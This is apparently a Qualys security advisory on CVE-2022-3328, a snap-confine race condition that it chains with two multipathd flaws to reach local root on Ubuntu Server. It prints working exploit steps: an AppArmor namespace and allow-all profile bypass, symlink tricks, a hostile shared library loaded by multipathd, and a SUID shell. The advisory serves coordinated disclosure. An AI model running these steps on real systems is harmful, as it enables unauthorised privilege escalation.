Qualys Security Advisory  
Race condition in snap-confine's must_mkdir_and_open_with_perms()  
I can't help but feel a missed opportunity to integrate lyrics from  
one of the best songs ever: [SNAP! - The Power (Official Video)]  
We discovered a race condition (CVE-2022-3328) in snap-confine, a  
SUID-root program installed by default on Ubuntu. In this advisory, we  
tell the story of this vulnerability (which was introduced in February  
2022 by the patch for CVE-2021-44731) and detail how we exploited it in  
Ubuntu Server (a local privilege escalation, from any user to root) by  
combining it with two vulnerabilities in multipathd (an authorization  
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):  
Like the crack of the whip, I Snap! attack  
Radical mind, day and night all the time  
-- SNAP! - The Power  
In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory:
to set up a snap's sandbox, snap-confine created the temporary directory  
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did  
not belong to root; a local attacker could race against snap-confine,  
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full  
root privileges.  
This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:  
Prevent user-controlled race in setup_private_mount"), which introduced  
a new helper function, must_mkdir_and_open_with_perms():  
142 static void setup_private_mount(const char *snap_name)  
169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);  
176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);  
55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,  
56 mode_t mode)  
61 mkdir:  
67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {  
70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);  
81 if (fstat(fd, &st) < 0) {  
84 if (st.st_uid != uid || st.st_gid != gid  
85 || st.st_mode != (S_IFDIR | mode)) {  
130 if (rename(dir, random_dir) < 0) {  
135 goto mkdir;  
- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if  
it does not exist already;  
- if it already exists, and if it does not belong to root (at line 84),  
then it is moved out of the way (at line 130) by rename()ing it to a  
random directory in /tmp, and its creation is retried (at line 135).  
When we reviewed this patch back in December 2021, we felt very nervous  
about this rename() call (because it allows a local attacker to rename()  
a directory they do not own), and we advised the Ubuntu Security Team to  
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create  
it in a non-world-writable directory instead of /tmp, or at least to use  
renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of  
these ideas were deemed impractical (for example, renameat2() is not  
supported by older kernel and glibc versions); moreover, we (Qualys)  
failed to come up with a feasible attack plan against this rename()  
call, so the patch was kept in its current form.  
After the release of Ubuntu 22.04 in April 2022, we decided to revisit  
snap-confine and its recent hardening changes, and we finally found a  
way to exploit the rename() call in must_mkdir_and_open_with_perms().  
It's getting, it's getting, it's getting kinda heavy  
It's getting, it's getting, it's getting kinda hectic  
-- SNAP! - The Power  
The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:  
1/ snap-confine operates in /tmp to create a snap's temporary directory  
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in  
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in  
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by  
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap  
instance name by sc_instance_name_validate() (when all of the Xs are  
lowercase alphanumeric):  
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)  
288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";  
291 if (mkdtemp(scratch_dir) == NULL) {  
303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);  
319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,  
331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;  
342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,  
343 mnt->path);  
352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,  
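
To make the name collision concrete, here is a simplified sketch of an instance-name check. It is not snapd's sc_instance_name_validate(): the function names and the exact rules (a snap name of lowercase letters, digits and single dashes, optionally followed by "_" and an instance key of 1 to 10 lowercase alphanumeric characters) are assumptions made for illustration. Under these rules, a string such as rootfs_0j4u9c is split into the snap name "rootfs" and the instance key "0j4u9c", and is accepted.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Lowercase ASCII letter or digit. */
static bool is_lower_alnum(char c)
{
    return (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');
}

/* Simplified snap-name rule (assumption): lowercase letters, digits and
 * single dashes; at least one letter; no leading or trailing dash. */
static bool snap_name_ok(const char *s, size_t len)
{
    bool has_letter = false;

    if (len == 0 || len > 40 || s[0] == '-' || s[len - 1] == '-')
        return false;
    for (size_t i = 0; i < len; i++) {
        if (s[i] == '-') {
            /* i + 1 < len here, because a trailing dash was rejected. */
            if (s[i + 1] == '-')
                return false;
        } else if (!is_lower_alnum(s[i])) {
            return false;
        } else if (s[i] >= 'a' && s[i] <= 'z') {
            has_letter = true;
        }
    }
    return has_letter;
}

/* Hypothetical validator: "<snap name>" or "<snap name>_<instance key>". */
bool instance_name_ok(const char *name)
{
    assert(name != NULL);

    const char *sep = strchr(name, '_');
    if (sep == NULL)
        return snap_name_ok(name, strlen(name));

    size_t key_len = strlen(sep + 1);
    if (key_len == 0 || key_len > 10)
        return false;
    for (size_t i = 0; i < key_len; i++)
        if (!is_lower_alnum(sep[1 + i]))
            return false;
    return snap_name_ok(name, (size_t)(sep - name));
}
```

With this sketch, instance_name_ok("rootfs_0j4u9c") is true, while a suffix containing an uppercase letter (for example "rootfs_0J4u9c") is rejected, which matches the "lowercase alphanumeric" condition stated above.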
2/ We therefore execute two instances of snap-confine in parallel:  
- we block the first snap-confine immediately after it creates its root  
directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this  
race condition by "single-stepping" snap-confine, as explained in our  
"Lemmings" advisory);  
- we execute the second snap-confine with a snap instance name of  
rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of  
this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX  
of the first snap-confine;  
- we kill this second snap-confine immediately after it rename()s its  
temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory  
/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we  
reliably win this race condition with inotify, as explained in our  
"Lemmings" advisory);  
- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and  
resume the execution of the first snap-confine, whose root directory  
now belongs to us.  
3/ We can therefore create an arbitrary symlink  
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will  
bind-mount the real /tmp directory (which is world-writable) onto any  
directory in the filesystem (because mount() will follow our arbitrary  
symlink at line 352).  
This ability will eventually allow us to obtain full root privileges,  
but we must first solve three problems:  
Problem a/ We cannot trick snap-confine into rename()ing  
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and  
must_mkdir_and_open_with_perms() rename()s it only if it does not belong  
to root!  
This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX  
belongs to the user root, but it belongs to the group of our own user,  
so must_mkdir_and_open_with_perms() rename()s it because it does not  
belong to the group root (at line 84).  
Problem b/ We cannot trick snap-confine into following our symlink  
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()  
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line  
319): if we create our symlink before this bind-mount, then it becomes  
covered by the squashfs; and we cannot create our symlink after this  
bind-mount, because the squashfs is read-only and belongs to root!  
The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"  
of our "Lemmings" advisory suggests a solution to this problem: we must  
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()  
bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used  
in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,  
but we found a surprisingly simple workaround:  
we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately  
after we re-create this directory ourselves; this allows us to unmount  
(with fusermount -u -z) any subsequent bind-mounts (even if they belong  
to root), because fusermount does not check that our FUSE filesystem is  
indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.  
Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp  
onto an arbitrary directory in the filesystem (at line 352), because  
such a bind-mount is forbidden by snap-confine's AppArmor profile!  
To solve this problem, we must bypass AppArmor completely, but the  
technique we used in our "Lemmings" advisory (we wrapped snap-confine's  
execution in an AppArmor profile that was in "complain" mode, not in  
"enforce" mode) was patched in February 2022 (by commits 26eed65 and  
4a2eb78, "ensure that snap-confine is in strict confinement" and  
"Tighten AppArmor label check"):  
now, snap-confine's execution must be wrapped in an AppArmor profile  
that is in "enforce" mode and whose label matches the regular expression  
We were about to give up on trying to exploit snap-confine, when we  
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is  
installed by default on Ubuntu Server): these two vulnerabilities allow  
us to create a directory named "failed_wwids" (user root, group root,  
mode 0700) anywhere in the filesystem, and we were able to transform  
this very limited directory creation into a complete AppArmor bypass.  
AppArmor supports policy namespaces that are loosely related to kernel  
user namespaces; by default, no AppArmor namespaces exist:  
$ ls -la /sys/kernel/security/apparmor/policy/namespaces  
total 0  
drwxr-xr-x 2 root root 0 Aug 6 12:42 .  
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..  
However, we (attackers) can create an AppArmor namespace "failed_wwids"  
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:  
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath  
$ multipathd list devices | grep 'whitelisted, unmonitored'  
sda1 devnode whitelisted, unmonitored  
$ multipathd list list path sda1  
$ ls -la /sys/kernel/security/apparmor/policy/namespaces  
total 0  
drwxr-xr-x 3 root root 0 Aug 6 12:42 .  
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..  
drwx------ 5 root root 0 Aug 6 13:38 failed_wwids  
Then, we can enter this AppArmor namespace by creating and entering an  
unprivileged user namespace:  
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh  
Inside this namespace, we can create an AppArmor profile labeled  
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all  
possible operations:  
# apparmor_parser -K -a << "EOF"  
/usr/lib/snapd/snap-confine (enforce) {  
Back in the initial namespace, we check that our "allow all" AppArmor  
profile still exists:  
# aa-status  
apparmor module is loaded.  
32 profiles are loaded.  
32 profiles are in enforce mode.  
Last, we make sure that snap-confine accepts our "allow all" AppArmor  
profile (i.e., AppArmor is bypassed, and snap-confine is effectively unconfined):
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent  
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine  
DEBUG: apparmor mode is: enforce  
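
The two DEBUG lines above correspond to the two parts of a process's AppArmor confinement context, which the kernel reports as "label (mode)" (or as a bare label such as "unconfined"). The sketch below splits such a string; it is an illustration with a hypothetical function name, not snap-confine's actual parsing code, and it says nothing about how the label is subsequently validated.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/*
 * Split an AppArmor context string of the form "label (mode)" in place.
 * On success, *label points at the label and *mode at the mode, or *mode
 * is NULL when the context has no "(mode)" suffix (e.g. "unconfined").
 * Returns false if the string is empty or malformed.
 */
bool split_aa_context(char *ctx, char **label, char **mode)
{
    assert(ctx != NULL && label != NULL && mode != NULL);

    size_t len = strlen(ctx);
    while (len > 0 && ctx[len - 1] == '\n')   /* strip trailing newline */
        ctx[--len] = '\0';

    *label = ctx;
    *mode = NULL;
    if (len == 0)
        return false;
    if (ctx[len - 1] != ')')
        return true;                          /* bare label, no mode */

    /* The mode starts after the last " (" in the string. */
    char *sep = NULL;
    for (char *p = ctx; (p = strstr(p, " (")) != NULL; p += 2)
        sep = p;
    if (sep == NULL)
        return false;

    ctx[len - 1] = '\0';                      /* drop the closing ')' */
    *sep = '\0';                              /* terminate the label */
    *mode = sep + 2;
    return true;
}
```

Applied to "/usr/lib/snapd/snap-confine (enforce)", this yields the label "/usr/lib/snapd/snap-confine" and the mode "enforce", the same pair shown in the debug output.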
We can therefore bind-mount /tmp onto an arbitrary directory in the  
filesystem (by exploiting CVE-2022-3328); since we already depend on  
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,  
create our own shared library /lib/multipath/, shut down
multipathd (by exploiting CVE-2022-41974), restart multipathd (through  
its Unix socket), and finally obtain full root privileges (because  
multipathd executes our shared library as root when it restarts):  
$ grep multipath /proc/self/mountinfo | wc  
0 0 0  
$ gcc -o CVE-2022-3328 CVE-2022-3328.c  
$ ./CVE-2022-3328  
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c  
$ grep multipath /proc/self/mountinfo  
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw  
$ gcc -fpic -shared -o /lib/multipath/ libtmpsh.c  
$ ps -ef | grep 'multipath[d]'  
root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s  
$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit  
$ ps -ef | grep 'multipath[d]' | wc  
0 0 0  
$ ls -l /tmp/sh  
ls: cannot access '/tmp/sh': No such file or directory  
$ multipathd list daemon  
error -104 receiving packet  
$ ls -l /tmp/sh  
-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh  
$ /tmp/sh -p  
# id  
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)  
We thank the Ubuntu security team (Alex Murray and Seth Arnold in  
particular) and the snapd team for their hard work on this snap-confine  
vulnerability. We also thank the members of linux-distros@openwall.  
2022-08-23: Contacted security@ubuntu.  
2022-11-28: Contacted linux-distros@openwall.  
2022-11-30: Coordinated Release Date (17:00 UTC).